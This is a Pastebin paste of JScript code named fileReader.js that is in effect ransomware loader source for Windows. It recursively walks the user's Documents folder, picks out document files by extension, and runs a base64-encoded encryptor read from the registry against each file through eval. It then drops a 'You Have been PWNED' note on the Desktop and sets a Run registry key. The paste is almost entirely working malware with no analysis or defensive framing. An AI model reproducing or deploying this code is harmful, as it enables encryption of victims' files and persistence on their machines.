FlyFar

fileReader.js

Sep 23rd, 2023
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.88 KB | Cybersecurity | 0 0
  1. //Base64 Decoder
  2. var base64={};base64.PADCHAR='=';base64.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';base64.makeDOMException=function(){var e,tmp;try{return new DOMException(DOMException.INVALID_CHARACTER_ERR)}catch(tmp){var ex=new Error('DOM Exception 5');ex.code=ex.number=5;ex.name=ex.description='INVALID_CHARACTER_ERR';ex.toString=function(){return'Error: '+ex.name+': '+ex.message};return ex}};base64.getbyte64=function(s,i){var idx=base64.ALPHA.indexOf(s.charAt(i));if(idx===-1){throw base64.makeDOMException();}return idx};base64.decode=function(s){s=''+s;var getbyte64=base64.getbyte64;var pads,i,b10;var imax=s.length;if(imax===0){return s}if(imax%4!==0){throw base64.makeDOMException();}pads=0;if(s.charAt(imax-1)===base64.PADCHAR){pads=1;if(s.charAt(imax-2)===base64.PADCHAR){pads=2}imax-=4}var x=[];for(i=0;i<imax;i+=4){b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6)|getbyte64(s,i+3);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff,b10&0xff))}switch(pads){case 1:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff));break;case 2:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12);x.push(String.fromCharCode(b10>>16));break}return x.join('')};base64.getbyte=function(s,i){var x=s.charCodeAt(i);if(x>255){throw base64.makeDOMException();}return x};base64.encode=function(s){if(arguments.length!==1){throw new SyntaxError('Not enough arguments');}var padchar=base64.PADCHAR;var alpha=base64.ALPHA;var getbyte=base64.getbyte;var i,b10;var x=[];s=''+s;var imax=s.length-s.length%3;if(s.length===0){return s}for(i=0;i<imax;i+=3){b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8)|getbyte(s,i+2);x.push(alpha.charAt(b10>>18));x.push(alpha.charAt((b10>>12)&0x3F));x.push(alpha.charAt((b10>>6)&0x3f));x.push(alpha.charAt(b10&0x3f))}switch(s.length-imax){case 1:b10=getbyte(s,i)<<16;x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+padchar+padchar);break;case 2:b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8);x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+alpha.charAt((b10>>6)&0x3f)+padchar);break}return x.join('')};
  3. //
  4. var encryptor;
  5. var personalFolderRegistryEntry = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Personal';
  6. var encryptorRegistryEntry = 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\e';
  7. var fileNameToEncryptVar = 'fileNameToEncrypt';
  8. var processFlagReg = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PWNED';
  9. var fso = new ActiveXObject('Scripting.FileSystemObject');
  10. var fileExtList = {
  11.     txt : 'txt',
  12.     doc : 'doc',
  13.     docx : 'docx',
  14.     pdf : 'pdf',
  15.     xls : 'xls',
  16.     xlsx : 'xlsx',
  17.     xlsm : 'xlsm'
  18. };
  19.  
  20. var pwnedFileList = [];
  21.  
  22. function getFileExt(fileShortName) {
  23.     if(fileShortName.indexOf('.') > -1) {
  24.         return fileShortName.split('.').pop().toLowerCase();
  25.     } else {
  26.         return false;
  27.     }
  28. };
  29.  
  30. function isValidExt(fileShortName) {
  31.     var ext = getFileExt(fileShortName);
  32.     return ext ? fileExtList[ext] : false;
  33. };
  34.  
  35. function getFiles(folderPath) {
  36.     var folder = fso.GetFolder(folderPath);
  37.     var files = folder.files;
  38.     if(files.count > 0) {
  39.     var fileList = new Enumerator(folder.files);
  40.     for (; !fileList.atEnd(); fileList.moveNext()) {
  41.             try {
  42.                 if(isValidExt(fileList.item().ShortName)) {
  43.                     pwnedFileList.push(fileList.item().path);
  44.                     var evalString = 'var '+fileNameToEncryptVar+' = \''+fileList.item().path.replace(/\\/g, '\\\\')+'\';' + encryptor;
  45.                     eval(evalString);
  46.                 }
  47.             } catch(err) {}
  48.         }
  49.     }
  50. };
  51.  
  52. function getFolders(path) {
  53.     var folder = fso.GetFolder(path);
  54.     var subFolders = folder.SubFolders;
  55.     if(subFolders.count > 0) {
  56.         var folderList = new Enumerator(subFolders);
  57.         for (; !folderList.atEnd(); folderList.moveNext()) {
  58.             try {
  59.                 getFolders(folderList.item());
  60.             } catch(err) {}
  61.         }
  62.     }
  63.     getFiles(path);
  64. };
  65.  
  66. function finish() {
  67.     if(pwnedFileList.length > 0) {
  68.         var wsh = new ActiveXObject('WScript.Shell');
  69.         var path = wsh.RegRead('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Desktop') + '\\You Are PWNED.html';
  70.         var htmlBody = '<html><head><title>You have been PWNED !!!!!!!</title></head><body><h1>You Have been PWNED by ME !!!!</h1><h3>Following files are encrypted</h3><p>'+   pwnedFileList.join('<br/>') +'</p></body></html>';
  71.         var a = fso.CreateTextFile(path, true);
  72.         a.WriteLine(htmlBody);
  73.         a.Close();
  74.         wsh.RegWrite(processFlagReg, path, "REG_SZ");
  75.     }
  76. };
  77.  
  78. function isAleardyPwned() {
  79.     try {
  80.         var wsh = new ActiveXObject('WScript.Shell');
  81.         var val = wsh.RegRead(processFlagReg);
  82.         return val != '';
  83.     } catch(err) {}
  84.     return false;
  85. };
  86. function getDocumentFolder() {
  87.     if(isAleardyPwned() == false) {
  88.         var wsh = new ActiveXObject('WScript.Shell');
  89.         var path = wsh.RegRead(personalFolderRegistryEntry);
  90.         encryptor = base64.decode(wsh.RegRead(encryptorRegistryEntry));
  91.         getFolders(path);
  92.         finish();
  93.     }
  94. };
  95. getDocumentFolder();
Add Comment
Please, Sign In to add comment